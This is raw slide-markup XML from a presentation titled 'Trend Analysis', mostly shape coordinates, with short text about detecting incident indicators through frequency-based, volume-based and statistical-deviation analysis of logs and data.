              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="1518284">
                  <a:moveTo>
                    <a:pt x="0" y="252984"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4076" y="207514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15829" y="164717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34544" y="125306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59504" y="89997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89997" y="59504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125306" y="34544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164717" y="15829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207514" y="4076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252984" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3633215" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3678685" y="4076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3721482" y="15829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3760893" y="34544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3796202" y="59504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3826695" y="89997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3851655" y="125306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3870370" y="164717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3882123" y="207514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="252984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="1264920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3882123" y="1310392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3870370" y="1353191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3851655" y="1392602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3826695" y="1427911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3796202" y="1458403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3760893" y="1483362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3721482" y="1502075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3678685" y="1513827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3633215" y="1517904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252984" y="1517904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207514" y="1513827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164717" y="1502075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125306" y="1483362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89997" y="1458403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59504" y="1427911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34544" y="1392602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15829" y="1353191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4076" y="1310392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1264920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="252984"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400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643743" y="6645935"/>
            <a:ext cx="3412490" cy="1173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3810">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Statistical </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>deviation </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="85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Identifies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anomalous</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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data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points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02714" y="6441185"/>
            <a:ext cx="3886200" cy="1519555"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3886200" h="1519554">
                <a:moveTo>
                  <a:pt x="0" y="253237"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4081" y="207726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15846" y="164888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34581" y="125438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59569" y="90093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90093" y="59569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125438" y="34581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164888" y="15846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207726" y="4081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253237" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3632962" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3678473" y="4081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3721311" y="15846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760761" y="34581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3796106" y="59569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3826630" y="90093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3851618" y="125438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3870353" y="164888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3882118" y="207726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3886200" y="253237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3886200" y="1266189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3882118" y="1311701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3870353" y="1354539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3851618" y="1393989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3826630" y="1429334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3796106" y="1459858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760761" y="1484846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3721311" y="1503581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3678473" y="1515346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3632962" y="1519427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253237" y="1519427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207726" y="1515346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164888" y="1503581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125438" y="1484846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90093" y="1459858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59569" y="1429334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34581" y="1393989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15846" y="1354539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4081" y="1311701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1266189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="253237"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="4279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340355" y="6574518"/>
            <a:ext cx="3009265" cy="1174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 indent="635">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Frequency-based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="65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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Logs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>number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events </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-56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per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period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817868" y="306451"/>
            <a:ext cx="26193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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trend</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis</a:t>
            </a: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48984" y="760476"/>
            <a:ext cx="3634740" cy="36575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248026" y="1882292"/>
            <a:ext cx="11755120" cy="2753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Trend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analysis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helps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detecting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indicators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over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a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time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series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through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prediction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future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events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visualization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types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incident.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can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applied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to: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>
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="4432300" marR="4342765" indent="-1905">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="85" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Volume-based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="90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Increases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dirty="0" sz="2200" spc="-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decreases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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>size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disc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599176" y="4672584"/>
            <a:ext cx="4998720" cy="3710940"/>
            <a:chOff x="5599176" y="4672584"/>
            <a:chExt cx="4998720" cy="3710940"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5599176" y="5958840"/>
              <a:ext cx="2421890" cy="2425065"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2421890" h="2425065">
                  <a:moveTo>
                    <a:pt x="1175639" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1128129" y="2154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1081116" y="6125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034634" y="11875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988716" y="19373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943397" y="28583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="898712" y="39470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854694" y="52001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811378" y="66141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="768798" y="81857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726989" y="99113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685984" y="117875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645818" y="138109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606525" y="159781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568139" y="182856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530696" y="207300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494228" y="233079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458771" y="260158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424358" y="288503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391025" y="318080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358804" y="348854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327731" y="380792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297839" y="413858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269163" y="448019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241738" y="483240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215597" y="519487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190775" y="556725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167305" y="594921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145224" y="634039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124563" y="674046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105359" y="714907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87645" y="756588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71455" y="799055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56824" y="842273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43785" y="886208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32374" y="930825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22625" y="976091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14571" y="1021971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8247" y="1068431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3688" y="1115436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927" y="1162952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1210945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957" y="1259750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3807" y="1308067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8512" y="1355860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15038" y="1403092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23348" y="1449726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33407" y="1495728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45178" y="1541059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58627" y="1585685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73718" y="1629568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90414" y="1672673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108680" y="1714962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128481" y="1756401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149780" y="1796952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172541" y="1836579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196730" y="1875246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222310" y="1912917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249246" y="1949555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277501" y="1985124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307040" y="2019587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337828" y="2052910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369828" y="2085054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403005" y="2115984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437323" y="2145663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472746" y="2174056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509239" y="2201126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546766" y="2226836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585291" y="2251151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624778" y="2274033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665192" y="2295448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706497" y="2315358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748656" y="2333727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791635" y="2350518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835398" y="2365697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879909" y="2379225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925131" y="2391068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971030" y="2401188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1017570" y="2409550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1064715" y="2416116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112429" y="2420852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160676" y="2423719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="2424684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258170" y="2423719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306432" y="2420852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354169" y="2416116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401345" y="2409550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447925" y="2401188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493872" y="2391068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1539149" y="2379225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583721" y="2365697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627550" y="2350518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670602" y="2333727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712840" y="2315358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754227" y="2295448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1794727" y="2274033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1834305" y="2251151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1872923" y="2226836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910546" y="2201126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947137" y="2174056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1982661" y="2145663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2017080" y="2115984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2050359" y="2085054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2082461" y="2052910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113351" y="2019587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142991" y="1985124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2171347" y="1949555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198381" y="1912917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224057" y="1875246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248339" y="1836579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271191" y="1796952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2292576" y="1756401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2312459" y="1714962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330803" y="1672673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2347572" y="1629568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362730" y="1585685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2376240" y="1541059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388066" y="1495728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2398173" y="1449726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406523" y="1403092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413080" y="1355860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417809" y="1308067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420673" y="1259750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421635" y="1210945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420590" y="1160074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417479" y="1109755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2412343" y="1060026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2405222" y="1010921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396154" y="962480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2385179" y="914738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372337" y="867732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357667" y="821499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2341210" y="776077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2323004" y="731501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303088" y="687810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2281504" y="645039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258290" y="603226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233485" y="562407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2207129" y="522620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2179263" y="483901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149924" y="446287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2119154" y="409815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2086991" y="374523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1659381" y="805434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1690709" y="843172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1718966" y="883060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1743987" y="924959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1765609" y="968734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783668" y="1014247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798000" y="1061362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1808440" y="1109941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1814824" y="1159847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816989" y="1210945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815155" y="1258360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809744" y="1304759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1800895" y="1350010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788742" y="1393978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773424" y="1436531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1755076" y="1477536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1733836" y="1516859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1709841" y="1554369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683228" y="1589931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654132" y="1623412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1622692" y="1654680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1589043" y="1683602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1553323" y="1710044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515669" y="1733874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1476218" y="1754958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435105" y="1773163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392469" y="1788357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1348445" y="1800406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303171" y="1809177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256784" y="1814537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="1816354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162075" y="1814537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115741" y="1809177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070551" y="1800406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026638" y="1788357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984136" y="1773163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943177" y="1754958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903896" y="1733874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866425" y="1710044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830898" y="1683602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797447" y="1654680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766206" y="1623412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737308" y="1589931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710886" y="1554369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687074" y="1516859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666005" y="1477536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647812" y="1436531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632627" y="1393978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620586" y="1350009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611819" y="1304759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606462" y="1258360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604647" y="1210945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606462" y="1163528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611819" y="1117127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620586" y="1071872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632627" y="1027899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647812" y="985340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666005" y="944328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687074" y="904997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710886" y="867479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737308" y="831908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766206" y="798418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797447" y="767140"/>
